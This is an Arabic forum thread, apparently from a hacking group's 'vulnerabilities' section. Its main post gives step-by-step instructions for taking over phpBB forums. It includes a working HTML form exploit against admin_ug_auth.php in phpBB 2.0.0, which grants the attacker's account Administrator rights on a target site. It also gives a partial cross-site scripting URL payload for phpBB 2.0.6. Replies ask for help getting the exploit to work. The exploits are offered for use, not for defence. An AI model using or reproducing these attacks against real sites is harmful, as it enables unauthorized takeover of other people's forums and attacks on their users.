لآ تآسَفن على غدرٍ آلزمآن لطآلمآ رٍقصت على جثث آلآسَوٍد كـَلآب وٍلآ تحسَبن برٍقصهآ تعلوٍآ على آسَيِّآدهآ فآلآسَوٍد آسَوٍد وٍآلكـَلآب كـَلآب تبقى آلآسَوٍد مخيِّفه فيِّ آسَرٍهآ حتى وٍآن نبحت عليِّهآ آلكـَلآب
 
الرئيسيةاليوميةس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول

شاطر | 
 

 بعض طرق اختراق منتدى phpbb

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
kingy



عدد المساهمات : 1
نقاط : 1
تاريخ التسجيل : 10/10/2011

مُساهمةموضوع: رد: بعض طرق اختراق منتدى phpbb   الإثنين أكتوبر 10, 2011 9:06 pm

واين هو رقم العضو
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
hemo



عدد المساهمات : 2
نقاط : 2
تاريخ التسجيل : 22/09/2011

مُساهمةموضوع: رد: بعض طرق اختراق منتدى phpbb   الخميس سبتمبر 22, 2011 1:47 am

الله يعطيك العافيه أخي

بس والله جربتها ماظبطت

يعني بعد ما حطيت صفه administrator ورقم العضويه

ما فتحت الصفحه يلي بعد هيك

ياريت تفيدنا في هل مشكله

ويعطلك الف عافيه

وياريت تقبلني عضوا في منتداك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
ميدو السامرائي
مدير
مدير


عدد المساهمات : 8
نقاط : 26
تاريخ التسجيل : 28/08/2010
العمر : 27

مُساهمةموضوع: بعض طرق اختراق منتدى phpbb   السبت أغسطس 28, 2010 8:22 pm

!بســــــــــــم الله الرحمـــــــــــــــــــــــــــــــــن الرحيـــــــــــــــــــــــــــــــــــم !
بعـــض طرق اختـــراق منتدى phpbb
ثغرة خطيرة من منتدى من نوع
PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الأصدار:
2.0.0
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها
كود PHP:
<html>
<
head>
head>
******>

<
form method="post"
action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php">
User Level: <select name="userlevel">
<
option value="admin">Administratoroption>
<
option value="user">Useroption>select>
<
input type="hidden" name="private[1]" value="0">
<
input type="hidden" name="moderator[1]" value="0">
<
input type="hidden" name="mode" value="user">
<
input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<
input type="submit" name="submit" value="Submit">

form>
body>
html>



عدل هذا العنوان الى عنوان الموقع المستهدف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك



::::::::
ثغره فى الاصدار Powered by phpBB 2.0.6

كل ما عليك تطبق الكود
كود PHP:
http://www.xxxxx.com/php/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe********>document.write(document
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
 
بعض طرق اختراق منتدى phpbb
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» أكواد css للنسخة الثانية

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
كروب ابطال بغداد ( شّبح + جنرٍآل ) :: منتدى الثغرات-
انتقل الى: